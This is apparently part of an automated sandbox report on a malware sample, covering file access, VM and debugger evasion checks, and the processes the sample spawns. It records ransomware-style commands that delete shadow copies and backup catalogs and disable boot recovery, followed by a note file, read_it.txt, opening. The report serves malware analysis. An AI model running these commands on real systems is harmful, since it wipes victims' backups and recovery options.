                  Source: C:\Windows\System32\svchost.exe TID: 5256Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3712Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0004BA74 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0004BA74
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0005D2A0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0005D2A0
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0006C358 FindFirstFileExA,0_2_0006C358
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD667E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF6DD667E4C
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD6588D0 FindFirstFileExW,FindClose,2_2_00007FF6DD6588D0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD671EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6DD671EE4
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD667E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF6DD667E4C
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0005F67D VirtualQuery,GetSystemInfo,0_2_0005F67D
                  Source: C:\Users\user\Desktop\main.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\Mai.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI76562\ucrtbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI76562\sqlite3.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI76562\unicodedata.pydJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info\Jump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140_1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140.dllJump to behavior
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: System32\vmGuestLib.dllz
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: System32\vmGuestLib.dll
                  Source: 4wx72yFLka.exe, 00000000.00000003.1466999791.00000000026C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Mai.exe, 00000004.00000003.2208933769.000001995DF89000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204751911.000001995DF65000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2252092172.000001995DFFC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1548165458.000001995DFAD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1536553084.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2225151854.000001995DFFB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2605770097.000001995E02A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1540473126.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1545270960.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2302459753.000001995E01E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2177784313.000001995DF36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWempr%SystemRoot%\system32\mswsock.dll
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxmrxnp.dllr
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxmrxnp.dll
                  Source: svchost.exe, 0000001E.00000002.3448004153.00000286A1E42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWARE
                  Source: Mai.exe, 00000004.00000003.1536808200.000001995DEF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW+
                  Source: 4wx72yFLka.exe, 00000000.00000003.1466999791.00000000026C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeAPI call chain: ExitProcess graph end nodegraph_0-24847
                  Source: C:\Users\user\Desktop\main.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0006085A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0006085A
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_00069000 mov eax, dword ptr fs:[00000030h]0_2_00069000
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0006D040 GetProcessHeap,0_2_0006D040
                  Source: C:\Users\user\Desktop\main.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0006085A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0006085A
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_000609ED SetUnhandledExceptionFilter,0_2_000609ED
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_00060BDA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00060BDA
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_00064E3F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00064E3F
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD65C57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6DD65C57C
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD65C760 SetUnhandledExceptionFilter,2_2_00007FF6DD65C760
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD65BCE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF6DD65BCE0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD66ABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6DD66ABD8
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA457ADF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFBA457ADF0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA457B758 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFBA457B758
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46CCD20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFBA46CCD20
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA471B970 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFBA471B970
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA471B3A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFBA471B3A0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA4733058 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFBA4733058
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA4732A90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFBA4732A90
                  Source: C:\Users\user\Desktop\main.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeProcess created: C:\Users\user\Desktop\Mai.exe "C:\Users\user\Desktop\Mai.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeProcess created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeProcess created: C:\Users\user\Desktop\Mai.exe "C:\Users\user\Desktop\Mai.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy deleteJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quietJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txtJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_00060676 cpuid 0_2_00060676
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0005BFAF
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Util VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\certifi VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography-42.0.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\ucrtbase.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\Desktop\Mai.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76562\base_library.zip VolumeInformationJump to behavior
